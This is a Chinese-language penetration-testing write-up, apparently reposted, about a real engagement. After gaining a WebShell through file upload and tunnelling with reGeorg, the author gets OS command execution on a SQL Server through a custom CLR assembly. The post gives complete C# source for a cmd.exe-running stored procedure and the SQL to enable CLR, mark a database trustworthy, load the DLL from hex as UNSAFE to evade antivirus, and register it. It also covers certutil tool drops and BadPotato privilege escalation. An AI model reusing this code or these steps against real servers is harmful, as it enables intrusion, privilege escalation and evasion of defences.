在某项目外围打点的过程中,通过文件上传拿到一个 WebShell。通过 WebShell 能够执行大多数的命令,且直接是 System 权限,但却无法执行 dir 进行列目录,导致冰蝎和蚁剑都无法使用。使用冰蝎进行命令行下的操作,回显极其的慢。通过 netstat,观察到站点连接内网中某台的服务器的 1433 端口,判断是站库分离的情形,于是决定建立隧道对数据库服务器进行渗透。而稍微大一点点的文件,都无法通过网站业务的上传功能进行上传,于是通过 WebShell 写入文件的方式,写入 reGeorg 隧道文件,快速建立起代理。
障碍
通过搜寻站点的数据库配置文件,得到了数据库的用户名和密码。通过 SSMS 远程连接进内网的数据库服务器,得到的用户有sysadmin 的权限。但不幸的是无法执行xp_cmdshell ,似乎该存储过程被删了。
突破-通过 CLR 进行命令执行CLR 简介
CLR(公共语言运行时)提供了 .NET Framework 的代码执行环境,可以通过 .NET Framework 来编写存储过程、触发器等功能 。简单说,通过 CLR 能够在 SQLServer 中注册一套程序集,实现执行任意的 .NET 代码。既然可以执行代码,此时就可以实现很多功能。
编写一个 CLR
首先,在 visual studio 中创建一个 SQLSever 项目
然后,添加一个存储过程项目
接着参照如下代码编写,即可简单实现通过 cmd.exe 来进行系统命令执行
usingSystem; usingSystem.Diagnostics; usingSystem.Text; usingMicrosoft.SqlServer.Server; publicpartialclassStoredProcedures { [ Microsoft.SqlServer.Server.SqlProcedure] publicstaticvoidCmdExec( String cmd) { // Put your code here SqlContext.Pipe.Send(Command( "cmd.exe", " /c "+ cmd)); } publicstaticstringCommand( stringfilename, stringarguments ) { varprocess = newProcess; process.StartInfo.FileName = filename; if(! string.IsNullOrEmpty(arguments)) { process.StartInfo.Arguments = arguments; } process.StartInfo.CreateNoWindow = true; process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; process.StartInfo.UseShellExecute = false; process.StartInfo.RedirectStandardError = true; process.StartInfo.RedirectStandardOutput = true; varstdOutput = newStringBuilder; process.OutputDataReceived += (sender, args) => stdOutput.AppendLine(args.Data); stringstdError = null; try { process.Start; process.BeginOutputReadLine; stdError = process.StandardError.ReadToEnd; process.WaitForExit; } catch(Exception e) { SqlContext.Pipe.Send(e.Message); } if(process.ExitCode == 0) { SqlContext.Pipe.Send(stdOutput.ToString); } else { varmessage = newStringBuilder; if(! string.IsNullOrEmpty(stdError)) { message.AppendLine(stdError); } if(stdOutput.Length != 0) { message.AppendLine(stdOutput.ToString); } SqlContext.Pipe.Send(filename + arguments + " finished with exit code = "+ process.ExitCode + ": "+ message); } returnstdOutput.ToString; } }命令执行
将代码编译完成后,会生成一个 DLL 文件,需要将 DLL 文件注册进数据库
默认情况下,MSSQL 的 CLR 是禁用的,因此首先需要开启 CLR 功能
sp_configure'clr enabled', 1 GO RECONFIGURE GO当导入了不安全的程序集之后,需将数据库标记为可信任的,对于其他数据库需要执行如下语句,但对 msdb 不需要,默认 msdb 就是的可信任的
ALTERDATABASEmasterSETTRUSTWORTHY ON;方式一,CLR 注册 DLL 支持十六进制的方式,以这种方式不需要将 DLL 文件落地到目标机器上,实现了无文件落地,能够规避杀软。并且,在目标无法处出网的情况下,也能完成操作
CREATEASSEMBLYsp_cmdExec FROM0x4D5A90000300000004000000FFFF0000B800000000000 WITHPERMISSION_SET = UNSAFE GO方式二,通过 SSMS 图形化界面注册
方式三,将文件落地目标机器上后进行注册
CREATEASSEMBLYsp_cmdExec FROM'C:ProgramDataDatabase1.dll' WITHPERMISSION_SET = UNSAFE GO注册完后,需创建存储过程,执行如下语句
CREATE PROCEDURE sp_cmdExec @Command [ nvarchar]( 4000) WITH EXECUTE AS CALLER AS EXTERNAL NAME sp_cmdExec.StoredProcedures.CmdExec GO一切顺利的话,此时就可以通过该存储过程进行系统命令的执行
提权
数据库服务器无法出网,可以利用 WEB 服务器做平台,通过 certutil 来落地工具。由于没先列出目标的 tasklist,贸然的上传一个提权工具,结果被杀软干掉了。后来使用 C# 写的 BadPotato 上传,没被杀,成功提权。
冒出一个想法,既然 BadPotato 是 C# 写的,那么是否可以通过 CLR 来提权。找到了 Badpotato 的代码一顿抄,然后实际使用的时候发现,没成功。
在 GitHub 上找到了 WarSQLKit.DLL 项目,里面内置了很多功能,比如提权。但翻看了一下代码,发现是通过写入一个 EXE 程序来完成的。在实际利用的时候发现,不知道什么情况没有权限写入 C:ProgramDataKumpir.exe , 导致提权失败,将其修改成其他目录也无法写入,不知是否杀软在起作用
代理
为了更好的进一步渗透,代理是必须的。此时已有 System 权限,可做代理的方式很多。MSSQLProxy 是基于 CLR 实现的代理工具,原理和实现方式有兴趣的可以去了解了解。
最后
简单记录了一下实际情况利用 CLR 的过程。CLR 的好处很明显,只要有sysadmin 权限,就可以完成命令执行,并且还可以无文件落地规避杀软,由于通过 .NET 代码拓展出无限可能性,在遇到 SQLServer 环境,可以说是一个大杀器。由于是实际的项目,不便贴上过多细节的图片,部分 SQLServer 环境由本地搭建测试,若有表述不到位的地方,还请见谅。
版权申明:本站文章均来自网络,如有侵权,请联系01056159998 邮箱:itboby@foxmail.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有